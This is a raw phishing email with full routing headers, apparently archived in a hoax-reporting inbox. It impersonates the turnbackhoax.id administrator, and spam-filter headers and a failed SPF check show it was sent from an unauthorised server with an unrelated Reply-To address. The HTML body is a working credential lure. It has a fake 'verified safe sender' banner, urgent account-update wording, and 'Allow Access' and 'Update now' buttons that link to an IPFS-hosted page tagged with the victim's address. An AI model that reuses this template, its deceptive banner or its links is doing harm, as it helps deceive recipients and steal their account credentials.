|
X-He-Spam-Score: 6.7
|
|
Return-Path: <admin@turnbackhoax.id>
|
|
Delivered-To: dropbox@plan.io
|
|
Received: from m.launch.gmbh ([127.0.0.1])
|
|
by m.launch.gmbh with LMTP id QASIM//IRGNuPQAAJzdhvw
|
|
for <dropbox@plan.io>; Tue, 11 Oct 2022 03:38:07 +0200
|
|
X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on m.launch.gmbh
|
|
X-Spam-Flag: YES
|
|
X-Spam-Level: ******
|
|
X-Spam-Status: Yes, score=6.7 required=5.0 tests=BAYES_00,DMARC_NONE,
|
|
HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_DNSWL_NONE,
|
|
RCVD_IN_MSPIKE_H2,RCVD_IN_SBL_CSS,SPF_HELO_NONE,SPF_PASS,TVD_PH_SEC,
|
|
URIBL_BLOCKED,URI_PHISH autolearn=no autolearn_force=no version=3.4.2
|
|
X-Spam-Report:
|
|
* 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was
|
|
* blocked. See
|
|
* http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
|
|
* for more information.
|
|
* [URIs: fleek.co]
|
|
* 1.3 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in
|
|
* bl.spamcop.net
|
|
* [Blocked - see <https://www.spamcop.net/bl.shtml?199.10.31.238>]
|
|
* -0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at
|
|
* https://www.dnswl.org/, no trust
|
|
* [64.90.62.164 listed in list.dnswl.org]
|
|
* 3.3 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS
|
|
* [159.203.94.112 listed in zen.spamhaus.org]
|
|
* -1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
|
|
* [score: 0.0000]
|
|
* 0.1 TVD_PH_SEC BODY: Message includes a phrase commonly used in
|
|
* phishing mails
|
|
* 0.1 DMARC_NONE DMARC record not found
|
|
* -0.1 SPF_PASS SPF check passed
|
|
* -0.0 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2)
|
|
* [64.90.62.164 listed in wl.mailspike.net]
|
|
* 0.0 SPF_HELO_NONE SPF: HELO does not publish an SPF Record
|
|
* 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
|
|
* 0.0 HTML_MESSAGE BODY: HTML included in message
|
|
* 3.7 URI_PHISH Phishing using web form
|
|
X-Spam-Score: 6.7
|
|
Envelope-to: inbox+rlxc+36be+hoax-clearing-center@plan.io
|
|
Authentication-Results: m.launch.gmbh; dmarc=none (p=none dis=none) header.from=turnbackhoax.id
|
|
Authentication-Results: m.launch.gmbh; spf=pass smtp.mailfrom=admin@turnbackhoax.id
|
|
Authentication-Results: m.launch.gmbh; dkim=none; dkim-atps=neutral
|
|
Received: from pdx1-sub0-mail-mx205.dreamhost.com (mx2.dreamhost.com [64.90.62.164])
|
|
(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits))
|
|
(No client certificate requested)
|
|
by m.launch.gmbh (Postfix) with ESMTPS id 4635C80331
|
|
for <inbox+rlxc+36be+hoax-clearing-center@plan.io>; Tue, 11 Oct 2022 03:38:06 +0200 (CEST)
|
|
Received: from postfix-inbound-v2-7.inbound.mailchannels.net (inbound-egress-6.mailchannels.net [199.10.31.238])
|
|
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
|
|
(No client certificate requested)
|
|
by pdx1-sub0-mail-mx205.dreamhost.com (Postfix) with ESMTPS id 4MmdhX0vfqz4xTL
|
|
for <lapor@turnbackhoax.id>; Mon, 10 Oct 2022 18:38:04 -0700 (PDT)
|
|
Received: from inbound-trex-1 (unknown [127.0.0.6])
|
|
by postfix-inbound-v2-7.inbound.mailchannels.net (Postfix) with ESMTP id D268040431
|
|
for <lapor@turnbackhoax.id>; Tue, 11 Oct 2022 01:38:03 +0000 (UTC)
|
|
ARC-Seal: i=1; s=arc-2022; d=mailchannels.net; t=1665452282; a=rsa-sha256;
|
|
cv=none;
|
|
b=UfU796XZE2dozmJLPvOgifFFQHQf/MTUbyIP0pbr6Fw+j1WGBpnUosrxztnbAEwJWzJH79
|
|
PHgTtlDdsCtFeZaXCpi2BGy+tpjRo9tJDkHCBcvng/4sYK3lkvipIEIOknc2ENJqajryfk
|
|
Vjm8eOwMJ9k10W9iSLq4FJUp89lFygWebgkKzydYV6KLSLFNExZSKWunSl9cDbo0A19zlQ
|
|
ZnieVYsaL0xlXdBHYVOGFiNSML7hAw7YN2bA863izmj/W9g+d+TiK4tLpg7gYfsFefPciD
|
|
veylBXcSsPTMDe7Z6meGGHGXE1d8NIVqxU1w+dKqmVFieP3mmFbLe+XgzOASlw==
|
|
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed;
|
|
d=mailchannels.net;
|
|
s=arc-2022; t=1665452282;
|
|
h=from:from:reply-to:reply-to:subject:subject:date:date:
|
|
message-id:message-id:to:to:cc:mime-version:mime-version:
|
|
content-type:content-type:
|
|
content-transfer-encoding:content-transfer-encoding;
|
|
bh=rV6vnN1AF5e2f3C4TPJwMDvTN9U+J6p0ecjIPiHDOCo=;
|
|
b=vArYgoVSnHp3t6usWJnvkscOpcwu0xcdtaHeXn9DjTQY1bBOXwYS40SrPuCiQbAlu2SWdM
|
|
UQunW4EdPkoe8beailqK81Q21B6iQnvf/QRfwHlpMYMll9wFLEqeOLY0yQPKKvYAaMoeqd
|
|
V9eGqpIjdXy4R5t3CVG13KdBR5nRoEw3sTIr6q8VgwIoNtnbxvV4ZhYb7nX9DerTg0G0b1
|
|
silddg+rasB1clrSjO6u8gtc13pHnwhUtS8ji5uvQ/27vI72egTfJrzCQa5MulvQjMLZC1
|
|
MRnjwLgUovcOTeB4rpcE7yOi7297rpl9/M9tjH4F3BS2gBdEEUt+X5bgUi6GeA==
|
|
ARC-Authentication-Results: i=1;
|
|
inbound-rspamd-544b889646-nql7g;
|
|
none
|
|
X-VR-STATUS: SPAM
|
|
X-Message-ID: AaBu2mhSun2TDsjdHxowxb59
|
|
Received: from hp0.xm9.mrsd.live (hp0.xm9.mrsd.live [159.203.94.112])
|
|
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384)
|
|
by 100.107.93.11 (trex/6.7.1);
|
|
Tue, 11 Oct 2022 01:38:03 +0000
|
|
Authentication-Results: inbound.mailchannels.net;
|
|
spf=fail smtp.mailfrom=admin@turnbackhoax.id;
|
|
dkim=none;
|
|
dmarc=none;
|
|
arc=none
|
|
Received-SPF: fail (dmarc-service-67fd9cbdd9-flmqx: domain of turnbackhoax.id
|
|
does not designate 159.203.94.112 as permitted sender)
|
|
client-ip=159.203.94.112; envelope-from=admin@turnbackhoax.id;
|
|
helo=hp0.xm9.mrsd.live;
|
|
Reply-To: yinyu@tijomega.com
|
|
From: turnbackhoax.id Admin <admin@turnbackhoax.id>
|
|
To: lapor@turnbackhoax.id
|
|
Subject: RE: Confirm access to your turnbackhoax.id
|
|
Date: 11 Oct 2022 09:37:59 +0800
|
|
Message-ID: <20221011093759.C7CCE7AF611ADBD6@turnbackhoax.id>
|
|
MIME-Version: 1.0
|
|
Content-Type: text/html;
|
|
charset="iso-8859-1"
|
|
Content-Transfer-Encoding: quoted-printable
|
|
|
|
<HTML><HEAD>
|
|
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.17037"></HEAD>
|
|
<body>
|
|
<P>
|
|
<table style=3D"FONT-SIZE: 15px; FONT-FAMILY: Arial, Helvetica, sans-serif;=
|
|
WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAPSE: collapse; TEXT-TR=
|
|
ANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(32,31,30); FONT-STYLE: normal; =
|
|
ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,25=
|
|
5,255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-=
|
|
text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration=
|
|
-style: initial; text-decoration-color: initial;=20
|
|
font-stretch: inherit">
|
|
<TBODY style=3D"BOX-SIZING: border-box">
|
|
<TR style=3D"BOX-SIZING: border-box">
|
|
<TH style=3D"BOX-SIZING: border-box; BORDER-TOP: black 0px solid; BORDER-RI=
|
|
GHT: black 0px solid; WIDTH: 2px; BORDER-BOTTOM: black 0px solid; PADDING-B=
|
|
OTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; BORDER-LEFT: black 0px sol=
|
|
id; PADDING-RIGHT: 5px; BACKGROUND-COLOR: rgb(2,151,64)"> </TH>
|
|
<td style=3D"BOX-SIZING: border-box; BORDER-TOP: black 0px solid; FONT-FAMI=
|
|
LY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; BORDER-RIGHT: black =
|
|
0px solid; WIDTH: 700px; BORDER-BOTTOM: black 0px solid; PADDING-BOTTOM: 5p=
|
|
x; PADDING-TOP: 5px; PADDING-LEFT: 5px; MARGIN: 0px; BORDER-LEFT: black 0px=
|
|
solid; PADDING-RIGHT: 5px; BACKGROUND-COLOR: rgb(243,255,248)"><SPAN style=
|
|
=3D"BOX-SIZING: border-box"><SPAN style=3D"BOX-SIZING: border-box">This sen=
|
|
der has been verified from<SPAN><SPAN>
|
|
turnbackhoax.id</SPAN></SPAN> safe senders list.</SPAN></SPAN><=
|
|
/TD></TR></TBODY></TABLE><BR class=3DApple-interchange-newline>
|
|
<table style=3D"FONT-SIZE: 13px; FONT-FAMILY: Roboto, RobotoDraft, Helvetic=
|
|
a, Arial, sans-serif; WIDTH: 630px; WHITE-SPACE: normal; WORD-SPACING: 0px;=
|
|
BORDER-COLLAPSE: collapse; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: =
|
|
rgb(38,40,42); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: n=
|
|
ormal; BACKGROUND-COLOR: rgb(255,255,255); font-variant-ligatures: normal; =
|
|
font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-=
|
|
thickness: initial; text-decoration-style: initial;=20
|
|
text-decoration-color: initial" cellspacing=3D"0" cellpadding=3D"0">
|
|
<TBODY>
|
|
<TR>
|
|
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
|
|
; MARGIN: 0px; MIN-HEIGHT: 12px"> </TD></TR>
|
|
<TR>
|
|
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
|
|
; WIDTH: 630px; MARGIN: 0px">
|
|
<table style=3D"WIDTH: 630px; VERTICAL-ALIGN: top; BORDER-COLLAPSE: collaps=
|
|
e" cellspacing=3D"0" cellpadding=3D"0">
|
|
<TBODY>
|
|
<TR>
|
|
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
|
|
; WIDTH: 31px; MARGIN: 0px"> </TD>
|
|
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
|
|
; WIDTH: 567px; MARGIN: 0px; LINE-HEIGHT: 24px">
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">Dear lapor</DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">We have registered an New Update on your account<SPAN> =
|
|
;lapor@turnbackhoax.id</SPAN><SPAN></SPAN>.</DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">For your security, please check the details of this operati=
|
|
on:</DIV></DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">
|
|
<A style=3D"FONT-SIZE: 16px; BORDER-TOP: rgb(54,148,253) 2px solid; BORDER-=
|
|
RIGHT: rgb(54,148,253) 2px solid; BORDER-BOTTOM: rgb(54,148,253) 2px solid;=
|
|
COLOR: rgb(54,148,253); PADDING-BOTTOM: 4px; PADDING-TOP: 4px; PADDING-LEF=
|
|
T: 14px; BORDER-LEFT: rgb(54,148,253) 2px solid; DISPLAY: inline-block; PAD=
|
|
DING-RIGHT: 14px; text-decoration-style: solid; text-decoration-color: curr=
|
|
entcolor; border-radius: 2px; text-decoration-line: none"=20
|
|
href=3D"https://ipfs.fleek.co/ipfs/QmcUHgyQosWZ2utJSWxWcLrieLsCUyYPPpthPj2P=
|
|
ytR8RL/#lapor@turnbackhoax.id" rel=3D"noopener noreferrer" target=3D_blank =
|
|
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://sfo3.digital=
|
|
oceanspaces.com/hamzlwebste6yhi10okajt/%2524%2521%2526%2524%253E%2526%2521%=
|
|
2526/%2521%2524%2526%2521%2526%2524%2521%2521%2524%2521.html%23nguyen.phank=
|
|
hoa@hinobinhduong.vn&source=3Dgmail&ust=3D1658858081837000&usg=
|
|
=3DAOvVaw1wecwBG4M6eRkDuJmPKaRj">Allow Access</A></DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">Please update your account immediately!</DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">
|
|
<A style=3D"FONT-SIZE: 16px; BORDER-TOP: rgb(54,148,253) 2px solid; BORDER-=
|
|
RIGHT: rgb(54,148,253) 2px solid; BORDER-BOTTOM: rgb(54,148,253) 2px solid;=
|
|
COLOR: rgb(54,148,253); PADDING-BOTTOM: 4px; PADDING-TOP: 4px; PADDING-LEF=
|
|
T: 14px; BORDER-LEFT: rgb(54,148,253) 2px solid; DISPLAY: inline-block; PAD=
|
|
DING-RIGHT: 14px; text-decoration-style: solid; text-decoration-color: curr=
|
|
entcolor; border-radius: 2px; text-decoration-line: none"=20
|
|
href=3D"https://ipfs.fleek.co/ipfs/QmcUHgyQosWZ2utJSWxWcLrieLsCUyYPPpthPj2P=
|
|
ytR8RL/#lapor@turnbackhoax.id" rel=3D"noopener noreferrer" target=3D_blank =
|
|
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://sfo3.digital=
|
|
oceanspaces.com/hamzlwebste6yhi10okajt/%2524%2521%2526%2524%253E%2526%2521%=
|
|
2526/%2521%2524%2526%2521%2526%2524%2521%2521%2524%2521.html%23nguyen.phank=
|
|
hoa@hinobinhduong.vn&source=3Dgmail&ust=3D1658858081837000&usg=
|
|
=3DAOvVaw1wecwBG4M6eRkDuJmPKaRj">Update now</A></DIV>
|
|
<DIV style=3D"MARGIN-BOTTOM: 24px; FONT-SIZE: 15px; COLOR: rgb(0,9,18); LIN=
|
|
E-HEIGHT: 24px">it is recommended that you check your external account secu=
|
|
rity.</DIV></TD>
|
|
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
|
|
; WIDTH: 31px; MARGIN: 0px"> </TD></TR></TBODY></TABLE></TD></TR></TBO=
|
|
DY></TABLE></P></BODY></HTML>
|
.